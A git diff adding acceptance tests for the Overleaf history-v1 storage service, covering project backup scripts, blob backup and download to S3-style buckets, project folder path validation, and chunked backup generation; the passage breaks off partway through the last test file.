loadGlobalBlobs() + + // Clean up any pre-existing test data + await projectsCollection.deleteMany({ + _id: projectId, + }) + await backedUpBlobs.deleteMany({}) // Clear any existing backedUpBlobs entries + }) + + describe('with simple project content', function () { + const contentString = 'hello world' + const newContentString = 'hello world more' + const graphPngPath = testFiles.path('graph.png') + const graphPngBuf = fs.readFileSync(graphPngPath) + const graphPngHash = testFiles.GRAPH_PNG_HASH + const nonBmpPath = testFiles.path('non_bmp.txt') + const DUMMY_HASH = '1111111111111111111111111111111111111111' + + beforeEach(async function () { + // Create initial project + await projectsCollection.insertOne(project) + + // Initialize project in chunk store + await ChunkStore.initializeProject(historyId) + + const blobStore = new BlobStore(historyId) + + // Create the blobs and then back them up using backupBlob + const graphPngBlob = await blobStore.putFile(graphPngPath) + await backupBlob(historyId, graphPngBlob, graphPngPath) + + // Add initial content using persistChanges + const file = File.fromString(contentString) + const addFileOp = Operation.addFile('main.tex', file) + const addGraphFileOp = Operation.addFile( + 'graph.png', + File.fromHash(testFiles.GRAPH_PNG_HASH) + ) + const change1 = new Change([addFileOp, addGraphFileOp], new Date(), []) + + await persistChanges(historyId, [change1], limitsToPersistImmediately, 0) + + // Add a second change with a proper TextOperation + // For text operation: first number is how many chars to retain, then the text to insert + const textOp = TextOperation.fromJSON({ + textOperation: [contentString.length, ' more'], // Keep existing content, append ' more' + }) + const editOp = Operation.editFile('main.tex', textOp) + const change2 = new Change([editOp], new Date(), []) + + // store an unrelated hash in the backedUpBlobs collection, + // so we can test that only the backed up hashes are cleared. 
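+ // After this call the collection should hold a document shaped roughly like
+ // { _id: <project id>, blobs: [Binary(bytes of DUMMY_HASH)] }
+ // (a sketch; the exact contents are asserted via backedUpBlobs.findOne() below)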
+ await storeBlobBackup(historyId, DUMMY_HASH) + + await persistChanges(historyId, [change2], limitsToPersistImmediately, 1) + }) + + it('should perform an initial backup', async function () { + // Run backup script for initial version + const { stdout } = await runBackupScript(['--projectId', projectId]) + expect(stdout).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Verify backup state + const result = await getBackupStatus(projectId) + expect(result.backupStatus.lastBackedUpVersion).to.equal(2) + expect(result.backupStatus.lastBackedUpAt).to.be.an.instanceOf(Date) + expect(result.currentEndTimestamp).to.be.an.instanceOf(Date) + expect(result.backupStatus.pendingChangeAt).to.be.undefined + + // Verify graph.png blob was backed up + const graphBlobStream = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, graphPngHash), + { autoGunzip: true } + ) + const graphBlobContent = await buffer(graphBlobStream) + expect(graphBlobContent.equals(graphPngBuf)).to.be.true + + // Verify chunk was backed up + const chunkStream = await backupPersistor.getObjectStream( + chunksBucket, + makeChunkKey(historyId, 0) + ) + const chunkContent = await text(chunkStream.pipe(createGunzip())) + const chunk = await ChunkStore.loadLatestRaw(historyId) + const rawHistory = await historyStore.loadRaw(historyId, chunk.id) + expect(JSON.parse(chunkContent)).to.deep.equal(rawHistory) + + // Unrelated entries from backedUpBlobs should not be cleared + const backedUpBlobsDoc = await backedUpBlobs.findOne({ + _id: project._id, + }) + expect(backedUpBlobsDoc).not.to.be.null + expect(backedUpBlobsDoc.blobs).to.have.length(1) + expect(backedUpBlobsDoc.blobs[0].toString('hex')).to.equal(DUMMY_HASH) + }) + + it('should perform an incremental backup', async function () { + // Backup first version + const { stdout: stdout1 } = await runBackupScript([ + '--projectId', + projectId, + ]) + expect(stdout1).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Verify first backup + const result1 = await getBackupStatus(projectId) + expect(result1.backupStatus.lastBackedUpVersion).to.equal(2) + + // Persist additional changes + const additionalTextOp = TextOperation.fromJSON({ + textOperation: [newContentString.length, ' even more'], // Keep existing content, append ' even more' + }) + const additionalEditOp = Operation.editFile('main.tex', additionalTextOp) + const firstTimestamp = new Date() + const additionalChange = new Change( + [additionalEditOp], + firstTimestamp, + [] + ) + + // add the non-BMP file + const blobStore = new BlobStore(historyId) + const nonBmpBlob = await blobStore.putFile(nonBmpPath) + await backupBlob(historyId, nonBmpBlob, nonBmpPath) + + // Verify that the non-BMP file was backed up when the file was added + const newBackedUpBlobs = await backedUpBlobs.findOne({ + _id: project._id, + }) + expect(newBackedUpBlobs).not.to.be.null + expect(newBackedUpBlobs.blobs).to.have.length(2) + expect( + newBackedUpBlobs.blobs.map(b => b.toString('hex')) + ).to.have.members([testFiles.NON_BMP_TXT_HASH, DUMMY_HASH]) + + const addNonBmpFileOp = Operation.addFile( + 'non_bmp.txt', + File.fromHash(testFiles.NON_BMP_TXT_HASH) + ) + const secondTimestamp = new Date() + const additionalChange2 = new Change( + [addNonBmpFileOp], + secondTimestamp, + [] + ) + + await persistChanges( + historyId, + [additionalChange, additionalChange2], + limitsToPersistImmediately, + 2 + ) + + const afterChangeResult = await getBackupStatus(projectId) + // Verify 
that the currentEndVersion and currentEndTimestamp are updated + expect(afterChangeResult.currentEndVersion).to.equal(4) + expect(afterChangeResult.currentEndTimestamp) + .to.be.an.instanceOf(Date) + .and.to.be.greaterThan(result1.currentEndTimestamp) + // Persisting a change should not modify the backup version and timestamp + expect(afterChangeResult.backupStatus.lastBackedUpVersion).to.equal(2) + expect(afterChangeResult.backupStatus.lastBackedUpAt) + .to.be.an.instanceOf(Date) + .and.to.deep.equal(result1.backupStatus.lastBackedUpAt) + // but it should update the pendingChangeAt timestamp to the timestamp of the + // first change which modified the project + expect(afterChangeResult.backupStatus.pendingChangeAt) + .to.be.an.instanceOf(Date) + .and.to.deep.equal(firstTimestamp) + + // Second backup + const { stdout: stdout2 } = await runBackupScript([ + '--projectId', + projectId, + ]) + expect(stdout2).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Verify incremental backup + const result2 = await getBackupStatus(projectId) + // The backup version and timestamp should be updated + expect(result2.backupStatus.lastBackedUpVersion).to.equal(4) + expect(result2.backupStatus.lastBackedUpAt) + .to.be.an.instanceOf(Date) + .and.to.be.greaterThan(result1.backupStatus.lastBackedUpAt) + // The currentEndVersion and currentEndTimestamp should not be modified + expect(result2.currentEndVersion).to.equal(4) + expect(result2.currentEndTimestamp) + .to.be.an.instanceOf(Date) + .and.to.deep.equal(afterChangeResult.currentEndTimestamp) + // The pendingChangeAt timestamp should be cleared when the backup is complete + expect(result2.backupStatus.pendingChangeAt).to.be.undefined + + // Verify additional blob was backed up + const newBlobStream = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, testFiles.NON_BMP_TXT_HASH), + { autoGunzip: true } + ) + const newBlobContent = await buffer(newBlobStream) + expect(newBlobContent).to.deep.equal( + fs.readFileSync(testFiles.path('non_bmp.txt')) + ) + + // Check chunk was backed up + const chunkStream = await backupPersistor.getObjectStream( + chunksBucket, + makeChunkKey(historyId, 0) + ) + const chunkContent = await text(chunkStream.pipe(createGunzip())) + const chunk = await ChunkStore.loadLatestRaw(historyId) + const rawHistory = await historyStore.loadRaw(historyId, chunk.id) + expect(JSON.parse(chunkContent)).to.deep.equal(rawHistory) + + // Unrelated entries from backedUpBlobs should not be cleared + const backedUpBlobsDoc = await backedUpBlobs.findOne({ + _id: project._id, + }) + expect(backedUpBlobsDoc).not.to.be.null + expect(backedUpBlobsDoc.blobs).to.have.length(1) + expect(backedUpBlobsDoc.blobs[0].toString('hex')).to.equal(DUMMY_HASH) + }) + + it('should not back up global blobs', async function () { + const globalBlobString = 'a' + const globalBlobHash = testFiles.STRING_A_HASH + await globalBlobs.insertOne({ + _id: globalBlobHash, + byteLength: globalBlobString.length, + stringLength: globalBlobString.length, + }) + const bucket = config.get('blobStore.globalBucket') + for (const { key, content } of [ + { + key: '2e/65/efe2a145dda7ee51d1741299f848e5bf752e', + content: globalBlobString, + }, + ]) { + const stream = Readable.from([content]) + await persistor.sendStream(bucket, key, stream) + } + await loadGlobalBlobs() + + // Create a change using the global blob + const addFileOp = Operation.addFile( + 'global.tex', + File.fromHash(globalBlobHash) + ) + const change = new 
Change([addFileOp], new Date(), []) + + await persistChanges(historyId, [change], limitsToPersistImmediately, 2) + + // Run backup + await runBackupScript(['--projectId', projectId]) + + // Verify global blob wasn't backed up + try { + await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, globalBlobHash), + { autoGunzip: true } + ) + expect.fail('Should not find global blob in project blobs') + } catch (err) { + expect(err).to.be.an.instanceOf(NotFoundError) + } + }) + + it('should back up global blobs if they are demoted', async function () { + const demotedBlobString = 'ab' + const demotedBlobHash = testFiles.STRING_AB_HASH + await globalBlobs.insertOne({ + _id: demotedBlobHash, + byteLength: demotedBlobString.length, + stringLength: demotedBlobString.length, + demoted: true, + }) + const bucket = config.get('blobStore.globalBucket') + for (const { key, content } of [ + { + key: '9a/e9/e86b7bd6cb1472d9373702d8249973da0832', + content: demotedBlobString, + }, + ]) { + const stream = Readable.from([content]) + await persistor.sendStream(bucket, key, stream) + } + await loadGlobalBlobs() + + // Create a change using the global blob + const addFileOp = Operation.addFile( + 'demoted.tex', + File.fromHash(demotedBlobHash) + ) + const change = new Change([addFileOp], new Date(), []) + + await persistChanges(historyId, [change], limitsToPersistImmediately, 2) + + // Run backup + const { stdout } = await runBackupScript(['--projectId', projectId]) + expect(stdout).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Check chunk was backed up + const chunkStream = await backupPersistor.getObjectStream( + chunksBucket, + makeChunkKey(historyId, 0) + ) + const chunkContent = await text(chunkStream.pipe(createGunzip())) + const chunk = await ChunkStore.loadLatestRaw(historyId) + const rawHistory = await historyStore.loadRaw(historyId, chunk.id) + expect(JSON.parse(chunkContent)).to.deep.equal(rawHistory) + + // Verify that the demoted global blob was backed up + try { + const demotedBlobStream = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, demotedBlobHash), + { + autoGunzip: true, + } + ) + const demotedBlobContent = await buffer(demotedBlobStream) + expect(demotedBlobContent).to.deep.equal(Buffer.from(demotedBlobString)) + } catch (err) { + expect.fail('Should find demoted global blob in project blobs') + } + }) + }) + + describe('with complex project content', function () { + let beforeInitializationTimestamp + let afterInitializationTimestamp + + beforeEach(async function () { + // Create initial project + await projectsCollection.insertOne(project) + + // Initialize project in chunk store + // bracket the initialisation with two timestamps to check the pendingChangeAt field + beforeInitializationTimestamp = new Date() + await ChunkStore.initializeProject(historyId) + afterInitializationTimestamp = new Date() + + const blobStore = new BlobStore(historyId) + + // Set up test files with varying content + const testFilesData = { + mainTex: { name: 'main.tex', content: 'Initial content' }, + chapter1: { name: 'chapter1.tex', content: 'Chapter 1 content' }, + chapter2: { name: 'chapter2.tex', content: 'Chapter 2 content' }, + bibliography: { + name: 'bibliography.bib', + content: '@article{key1,\n title={Title1}\n}', + newContent: '@article{key2,\n title={Title2}\n}', + }, + graph: { + name: 'graph.png', + path: testFiles.path('graph.png'), + hash: testFiles.GRAPH_PNG_HASH, + }, + unicodeFile: { + name: 
'unicodeFile.tex', + path: testFiles.path('non_bmp.txt'), + hash: testFiles.NON_BMP_TXT_HASH, + }, + } + + const textFiles = [ + testFilesData.mainTex, + testFilesData.chapter1, + testFilesData.chapter2, + testFilesData.bibliography, + ] + const binaryFiles = [testFilesData.graph, testFilesData.unicodeFile] + + // Add binary files first + await Promise.all(binaryFiles.map(file => blobStore.putFile(file.path))) + + // Back up the binary files + await Promise.all( + binaryFiles.map(async file => { + await backupBlob( + historyId, + await blobStore.putFile(file.path), + file.path + ) + }) + ) + + // Create operations to add all files initially + const addFileOperations = Object.values(testFilesData).map(file => { + if (file.path) { + return Operation.addFile(file.name, File.fromHash(file.hash)) + } + return Operation.addFile(file.name, File.fromString(file.content)) + }) + + // Initial change adding all files + const initialChange = new Change(addFileOperations, new Date(), []) + await persistChanges( + historyId, + [initialChange], + limitsToPersistImmediately, + 0 + ) + + // Generate a series of edit operations for each text file + const editOperations = [] + for (let i = 0; i < 50; i++) { + const targetFile = textFiles[i % textFiles.length] + if (!targetFile.path) { + // Skip binary/unicode files + const appendText = `\n\nEdit ${i + 1}` + targetFile.content += appendText + const textOp = TextOperation.fromJSON({ + textOperation: [ + targetFile.content.length - appendText.length, + appendText, + ], + }) + const editOp = Operation.editFile(targetFile.name, textOp) + editOperations.push(new Change([editOp], new Date(), [])) + } + } + + // Add a delete operation + const deleteChange = new Change( + [Operation.removeFile(testFilesData.bibliography.name)], + new Date(), + [] + ) + editOperations.push(deleteChange) + + // Add the file back with different content + const addBackChange = new Change( + [ + Operation.addFile( + testFilesData.bibliography.name, + File.fromString(testFilesData.bibliography.newContent) + ), + ], + new Date(), + [] + ) + editOperations.push(addBackChange) + // Persist all changes + await persistChanges( + historyId, + editOperations, + limitsToPersistImmediately, + 1 + ) + }) + + it('persistChanges should set the pendingChangeAt field to the time of snapshot initialisation', async function () { + const result = await getBackupStatus(projectId) + expect(result.backupStatus.pendingChangeAt).to.be.an.instanceOf(Date) + expect(result.backupStatus.pendingChangeAt) + .to.be.greaterThan(beforeInitializationTimestamp) + .and.to.be.lessThan(afterInitializationTimestamp) + }) + + it('should backup all chunks and blobs from a complex project history', async function () { + // Run backup script + const { stdout } = await runBackupScript(['--projectId', projectId]) + expect(stdout).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Verify backup state + const result = await getBackupStatus(projectId) + expect(result.backupStatus.lastBackedUpVersion).to.equal(53) // 1 initial change + 50 edits + 1 delete + 1 add back + expect(result.backupStatus.lastBackedUpAt).to.be.an.instanceOf(Date) + expect(result.currentEndTimestamp).to.be.an.instanceOf(Date) + expect(result.backupStatus.pendingChangeAt).to.be.undefined + + // Verify that binary files were backed up + for (const hash of [ + testFiles.GRAPH_PNG_HASH, + testFiles.NON_BMP_TXT_HASH, + ]) { + const blobStream = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, hash), + { 
autoGunzip: true } + ) + expect(blobStream).to.exist + } + + // Get all chunks and verify they were backed up + const listing = await backupPersistor + ._getClientForBucket(chunksBucket) + .listObjectsV2({ + Bucket: chunksBucket, + Prefix: projectKey.format(historyId) + '/', + }) + .promise() + const chunkKeys = listing.Contents.map(item => item.Key) + expect(chunkKeys.length).to.equal(6) // Should have multiple chunks + + const localChunks = await ChunkStore.getProjectChunks(historyId) + const chunksByStartVersion = new Map() + for (const chunkRecord of localChunks) { + chunksByStartVersion.set(chunkRecord.startVersion, chunkRecord) + } + + // Verify the content of each chunk matches what's in the history store + for (const chunkKey of chunkKeys) { + const chunkStream = await backupPersistor.getObjectStream( + chunksBucket, + chunkKey + ) + const chunkContent = await text(chunkStream.pipe(createGunzip())) + const startVersion = parseInt(chunkKey.split('/').pop(), 10) + const chunk = chunksByStartVersion.get(startVersion) + const rawHistory = await historyStore.loadRaw(historyId, chunk.id) + expect(JSON.parse(chunkContent)).to.deep.equal(rawHistory) + } + }) + + it('should throw an error if downloading a blob fails', async function () { + const blobStore = new BlobStore(historyId) + const blob = await blobStore.putFile( + testFiles.path('null_characters.txt') + ) + const change = new Change( + [Operation.addFile('broken-file', File.fromHash(blob.getHash()))], + new Date(), + [] + ) + // Persist all changes + await persistChanges(historyId, [change], limitsToPersistImmediately, 53) + + // Delete the blob from the underlying storage to simulate a failure + const bucket = config.get('blobStore.projectBucket') + const key = makeProjectKey(historyId, blob.getHash()) + await persistor.deleteObject(bucket, key) + + // Run backup script - it should fail because the blob is missing + let result + try { + result = await runBackupScript(['--projectId', projectId]) + expect.fail('Backup script should have failed') + } catch (err) { + expect(err).to.exist + expect(result).to.not.exist + } + + // Verify that backup did not complete + const newBackupStatus = await getBackupStatus(projectId) + expect(newBackupStatus.backupStatus.lastBackedUpVersion).to.equal(50) // backup fails on final chunk + expect(newBackupStatus.currentEndVersion).to.equal(54) // backup is incomplete due to missing blob + }) + }) +}) + +/** + * Run the backup script with given arguments + * @param {string[]} args + */ +async function runBackupScript(args) { + const TIMEOUT = 20 * 1000 + let result + try { + result = await promisify(execFile)( + 'node', + ['storage/scripts/backup.mjs', ...args], + { + encoding: 'utf-8', + timeout: TIMEOUT, + env: { + ...process.env, + LOG_LEVEL: 'debug', // Override LOG_LEVEL of acceptance tests + }, + } + ) + result.status = 0 + } catch (err) { + const { stdout, stderr, code } = err + if (typeof code !== 'number') { + console.log(err) + } + result = { stdout, stderr, status: code } + } + if (result.status !== 0) { + throw new Error('backup failed') + } + return result +} diff --git a/services/history-v1/test/acceptance/js/storage/backupBlob.test.mjs b/services/history-v1/test/acceptance/js/storage/backupBlob.test.mjs new file mode 100644 index 0000000..73ead77 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/backupBlob.test.mjs @@ -0,0 +1,278 @@ +import { expect } from 'chai' +import Crypto from 'node:crypto' +import Stream from 'node:stream' +import { + makeBlobForFile, + 
getStringLengthOfFile, + makeProjectKey, + BlobStore, +} from '../../../../storage/lib/blob_store/index.js' +import { Blob } from 'overleaf-editor-core' +import { insertBlob } from '../../../../storage/lib/blob_store/mongo.js' +import { + backupBlob, + downloadBlobToDir, +} from '../../../../storage/lib/backupBlob.mjs' +import fs from 'node:fs' +import path from 'node:path' +import os from 'node:os' +import fsExtra from 'fs-extra' +import { backedUpBlobs, projects } from '../../../../storage/lib/mongodb.js' +import { Binary, ObjectId } from 'mongodb' +import { + backupPersistor, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { WritableBuffer } from '@overleaf/stream-utils' +import cleanup from './support/cleanup.js' + +async function listS3BucketRaw(bucket) { + const client = backupPersistor._getClientForBucket(bucket) + return await client.listObjectsV2({ Bucket: bucket }).promise() +} + +async function listS3Bucket(bucket, wantStorageClass) { + const response = await listS3BucketRaw(bucket) + for (const object of response.Contents || []) { + if (wantStorageClass) { + expect(object).to.have.property('StorageClass', wantStorageClass) + } + } + + return (response.Contents || []).map(item => item.Key || '') +} + +describe('backupBlob', function () { + let filePath + let tmpDir + + before(async function () { + tmpDir = await fs.promises.mkdtemp(path.join(os.tmpdir(), 'temp-test-')) + filePath = path.join(tmpDir, 'test.txt') + await fs.promises.writeFile(filePath, 'test') + }) + + after(async function () { + try { + await fsExtra.remove(tmpDir) + } catch (err) { + if (err.code !== 'ENOENT') { + console.log('failed to delete temporary directory') + } + } + }) + + beforeEach(cleanup.everything) + + describe('when the blob is already backed up', function () { + let blob + let historyId + + beforeEach(async function () { + blob = await makeBlobForFile(filePath) + historyId = 'abc123def456abc789def123' + await backedUpBlobs.updateOne( + { + _id: new ObjectId(historyId), + }, + { + $set: { blobs: [new Binary(Buffer.from(blob.getHash(), 'hex'))] }, + }, + { upsert: true } + ) + await backupBlob(historyId, blob, filePath) + }) + + it('does not upload the blob', async function () { + const bucketContents = await listS3Bucket(projectBlobsBucket) + expect(bucketContents).to.have.lengthOf(0) + }) + }) + + describe('when the historyId is for a postgres project', function () { + let blob + let historyId + const projectId = new ObjectId() + + beforeEach(async function () { + blob = await makeBlobForFile(filePath) + historyId = '123' + await projects.insertOne({ + _id: projectId, + overleaf: { history: { id: 123 } }, + }) + await backupBlob(historyId, blob, filePath) + }) + + afterEach(async function () { + await projects.deleteOne({ + _id: projectId, + }) + }) + + it('uploads the blob to the backup', async function () { + const bucketContents = await listS3Bucket(projectBlobsBucket) + expect(bucketContents).to.have.lengthOf(1) + }) + it('stores the backup', async function () { + expect( + await backedUpBlobs.findOne({ + _id: projectId, + blobs: { + $elemMatch: { $eq: new Binary(Buffer.from(blob.getHash(), 'hex')) }, + }, + }) + ).to.exist + }) + }) + + describe('when the blob is not already backed up', function () { + let blob + let historyId + beforeEach(async function () { + blob = await makeBlobForFile(filePath) + historyId = 'abc123def456abc789def123' + await backupBlob(historyId, blob, filePath) + }) + + it('uploads the blob to the backup', async function () { + const 
bucketContents = await listS3Bucket(projectBlobsBucket) + expect(bucketContents).to.have.lengthOf(1) + }) + it('stores the backup', async function () { + expect( + await backedUpBlobs.findOne({ + _id: new ObjectId(historyId), + blobs: { + $elemMatch: { $eq: new Binary(Buffer.from(blob.getHash(), 'hex')) }, + }, + }) + ).to.exist + }) + }) + + const cases = [ + { + name: 'text file', + content: Buffer.from('x'.repeat(1000)), + storedSize: 29, // zlib.gzipSync(content).byteLength + }, + { + name: 'large text file', + // 'ü' is a 2-byte utf-8 character -> 4MB. + content: Buffer.from('ü'.repeat(2 * 1024 * 1024)), + storedSize: 4101, // zlib.gzipSync(content).byteLength + }, + { + name: 'binary file', + content: Buffer.from([0, 1, 2, 3]), + storedSize: 4, + }, + { + name: 'large binary file', + content: Crypto.randomBytes(10 * 1024 * 1024), + storedSize: 10 * 1024 * 1024, + }, + ] + for (const { name, content, storedSize } of cases) { + describe(name, function () { + let blob + let key + let historyId + beforeEach(async function () { + historyId = 'abc123def456abc789def123' + await fs.promises.writeFile(filePath, content) + blob = await makeBlobForFile(filePath) + blob.setStringLength( + await getStringLengthOfFile(blob.getByteLength(), filePath) + ) + key = makeProjectKey(historyId, blob.getHash()) + await backupBlob(historyId, blob, filePath) + }) + it('should upload the blob', async function () { + const response = await listS3BucketRaw(projectBlobsBucket) + expect(response.Contents).to.have.length(1) + expect(response.Contents[0].Key).to.equal(key) + expect(response.Contents[0].Size).to.equal(storedSize) + }) + it('should read back the same content', async function () { + const buf = new WritableBuffer() + await Stream.promises.pipeline( + await backupPersistor.getObjectStream(projectBlobsBucket, key, { + autoGunzip: true, + }), + buf + ) + expect(buf.getContents()).to.deep.equal(content) + }) + }) + } +}) + +describe('downloadBlobToDir', function () { + let tmpDirDownload + const historyId = 'abc123def456abc789def123' + + before(async function () { + tmpDirDownload = await fs.promises.mkdtemp( + path.join(os.tmpdir(), 'downloadBlobTest-') + ) + }) + + after(async function () { + await fs.promises.rm(tmpDirDownload, { recursive: true, force: true }) + }) + + it('should download the blob successfully', async function () { + const data = 'hello world' + // Use putString instead of writing a source file and using makeBlobForFile + const blobStore = new BlobStore(historyId) + const blob = await blobStore.putString(data) + + // Now call downloadBlobToDir which will use blobStore.getStream internally + const downloadedFilePath = await downloadBlobToDir( + historyId, + blob, + tmpDirDownload + ) + const contents = await fs.promises.readFile(downloadedFilePath, 'utf8') + expect(contents).to.equal(data) + }) + + it('should delete the file on error (if file already exists)', async function () { + const data = 'data that will not be written' + const blobStore = new BlobStore(historyId) + const blob = await blobStore.putString(data) + const hash = blob.getHash() + const fileName = `${historyId}-${hash}` + + // Pre-create the destination file to trigger a failure due to an existing file + const downloadedFilePath = path.join(tmpDirDownload, fileName) + await fs.promises.writeFile(downloadedFilePath, 'preexisting content') + + try { + await downloadBlobToDir(historyId, blob, tmpDirDownload) + expect.fail('should not reach here') + } catch (error) { + // Check that the file was deleted + await 
expect(fs.promises.access(downloadedFilePath)).to.be.rejected + } + }) + + it('should not leave an empty file if download fails', async function () { + // Create a blob with a hash that does not exist in the blob store + const hash = '0000000000000000000000000000000000000000' + const blob = new Blob(hash, 12, 12) + await insertBlob(historyId, blob) + const fileName = `${historyId}-${hash}` + try { + await downloadBlobToDir(historyId, blob, tmpDirDownload) + expect.fail('should not reach here') + } catch (error) { + expect(error).to.be.instanceOf(Blob.NotFoundError) + const downloadedFilePath = path.join(tmpDirDownload, fileName) + // Check that the file was deleted + await expect(fs.promises.access(downloadedFilePath)).to.be.rejected + } + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/backupPersistor.test.mjs b/services/history-v1/test/acceptance/js/storage/backupPersistor.test.mjs new file mode 100644 index 0000000..e9aedac --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/backupPersistor.test.mjs @@ -0,0 +1,51 @@ +import { + pathToProjectFolder, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { expect } from 'chai' + +describe('backupPersistor', () => { + describe('pathToProjectFolder', () => { + it('handles postgres and mongo-ids', function () { + expect(pathToProjectFolder(projectBlobsBucket, '100/000/000')).to.equal( + '100/000/000/' + ) + expect(pathToProjectFolder(projectBlobsBucket, '100/000/000/')).to.equal( + '100/000/000/' + ) + expect( + pathToProjectFolder(projectBlobsBucket, '100/000/000/foo') + ).to.equal('100/000/000/') + expect(pathToProjectFolder(projectBlobsBucket, '210/000/000')).to.equal( + '210/000/000/' + ) + expect(pathToProjectFolder(projectBlobsBucket, '987/654/321')).to.equal( + '987/654/321/' + ) + expect(pathToProjectFolder(projectBlobsBucket, '987/654/3219')).to.equal( + '987/654/3219/' + ) + expect( + pathToProjectFolder(projectBlobsBucket, 'fed/cba/987654321000000000') + ).to.equal('fed/cba/987654321000000000/') + expect( + pathToProjectFolder(projectBlobsBucket, 'fed/cba/987654321000000000/') + ).to.equal('fed/cba/987654321000000000/') + expect( + pathToProjectFolder( + projectBlobsBucket, + 'fed/cba/987654321000000000/foo' + ) + ).to.equal('fed/cba/987654321000000000/') + }) + + it('rejects invalid input', function () { + const cases = ['', '//', '1/2/3', '123/456/78', 'abc/d/e', 'abc/def/012'] + for (const key of cases) { + expect(() => { + pathToProjectFolder(projectBlobsBucket, key) + }, key).to.throw('invalid project folder') + } + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/backup_generator.test.mjs b/services/history-v1/test/acceptance/js/storage/backup_generator.test.mjs new file mode 100644 index 0000000..3c0e8f1 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/backup_generator.test.mjs @@ -0,0 +1,338 @@ +import { expect } from 'chai' +import { backupGenerator } from '../../../../storage/lib/backupGenerator.mjs' +import ChunkStore from '../../../../storage/lib/chunk_store/index.js' +import persistChanges from '../../../../storage/lib/persist_changes.js' +import { + Change, + Operation, + TextOperation, + AddFileOperation, + File, +} from 'overleaf-editor-core' +import { ObjectId } from 'mongodb' +import testFiles from './support/test_files.js' +import { BlobStore } from '../../../../storage/lib/blob_store/index.js' +import fs from 'node:fs' +import blobHash from '../../../../storage/lib/blob_hash.js' + +const scenarios = [ + { + 
description: 'Postgres history', + createProject: ChunkStore.initializeProject, + }, + { + description: 'Mongo history', + createProject: () => + ChunkStore.initializeProject(new ObjectId().toString()), + }, +] + +for (const scenario of scenarios) { + describe(`backupGenerator with ${scenario.description}`, function () { + let projectId + let limitsToPersistImmediately + let blobStore + const NUM_CHUNKS = 3 + const FINAL_VERSION = 24 + + before(function () { + // used to provide a limit which forces us to persist all of the changes + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + maxChunkChanges: 10, + } + }) + + beforeEach(async function () { + projectId = await scenario.createProject() + blobStore = new BlobStore(projectId) + + // Add test files first + await Promise.all([ + blobStore.putFile(testFiles.path('graph.png')), + blobStore.putFile(testFiles.path('non_bmp.txt')), + ]) + + const HELLO_TXT = fs.readFileSync(testFiles.path('hello.txt')).toString() + + // Create a sample project history for testing, with a chunk size of 10 + // + // 1. Add a text file main.tex with contents from hello.txt + // 2. Add a binary file image.png with contents from graph.png + // 3. Add a text file other.tex with empty contents + // 4. Apply 10 changes that append characters to the end of other.tex giving 'aaaaaaaaaa' + // In applying the 10 changes we hit the first chunk boundary and create a new chunk. + // The first chunk contains the 3 file operations and 7 changes + // to other.tex which is now "aaaaaaa" (7 characters) + // snapshot: {} + // changes: add main.tex, add image.png, add other.tex, 7 changes to other.tex + // The second chunk has a snapshot with the existing files + // snapshot: main.tex, image.png, other.tex="aaaaaaa" (7 characters) + // changes: 3 changes to other.tex, each appending 'a' + // 5. Now we add a new file non_bmp.txt with non-BMP characters + // 6. Finally we apply 10 more changes to other.tex, each appending another 'a' to give 'aaaaaaaaaaaaaaaaaaaa' (20 characters) + // In applying the 10 changes we hit another chunk boundary and create a third chunk. + // The final state of the second chunk is + // snapshot: main.tex, image.png, other.tex="aaaaaaa" (7 characters) + // changes: + // 3 changes to other.tex, each appending 'a' + // add file non_bmp.txt, + // 6 changes to other.tex, each appending 'a' + // The third chunk will contain the last 4 changes to other.tex + // snapshot: main.tex, image.png, non_bmp.txt, other.tex="aaaaaaaaaaaaaaaa" (16 characters) + // changes: 4 changes to other.tex, each appending 'a' + + const textChange = new Change( + [new AddFileOperation('main.tex', File.fromString(HELLO_TXT))], + new Date(), + [] + ) + const binaryChange = new Change( + [ + new AddFileOperation( + 'image.png', + File.fromHash(testFiles.GRAPH_PNG_HASH) + ), + ], + new Date(), + [] + ) + const otherChange = new Change( + [new AddFileOperation('other.tex', File.fromString(''))], + new Date(), + [] + ) + // now append characters to the end of the contents of other.tex + const otherEdits = Array.from( + { length: 10 }, + (_, i) => + new Change( + [ + Operation.editFile( + 'other.tex', + TextOperation.fromJSON({ + textOperation: i === 0 ? 
['a'] : [i, 'a'], + }) + ), + ], + new Date(), + [] + ) + ) + const newFile = new Change( + [ + new AddFileOperation( + 'non_bmp.txt', + File.fromHash(testFiles.NON_BMP_TXT_HASH) + ), + ], + new Date(), + [] + ) + const moreOtherEdits = Array.from( + { length: 10 }, + (_, i) => + new Change( + [ + Operation.editFile( + 'other.tex', + TextOperation.fromJSON({ textOperation: [i + 10, 'a'] }) + ), + ], + new Date(), + [] + ) + ) + + await persistChanges( + projectId, + [ + textChange, + binaryChange, + otherChange, + ...otherEdits, + newFile, + ...moreOtherEdits, + ], + limitsToPersistImmediately, + 0 + ) + }) + + it('should yield correct data for an initial backup', async function () { + const results = [] + for await (const result of backupGenerator(projectId)) { + results.push(result) + } + + // There should be 3 chunks + expect(results).to.have.length(NUM_CHUNKS) + + // First chunk + expect(results[0].chunkRecord.startVersion).to.equal(0) + expect(results[0].chunkRecord.endVersion).to.equal(10) + expect(results[0].blobsToBackup).to.have.deep.members([ + { + hash: testFiles.HELLO_TXT_HASH, + byteLength: testFiles.HELLO_TXT_BYTE_LENGTH, + stringLength: testFiles.HELLO_TXT_UTF8_LENGTH, + }, + { + hash: testFiles.GRAPH_PNG_HASH, + byteLength: 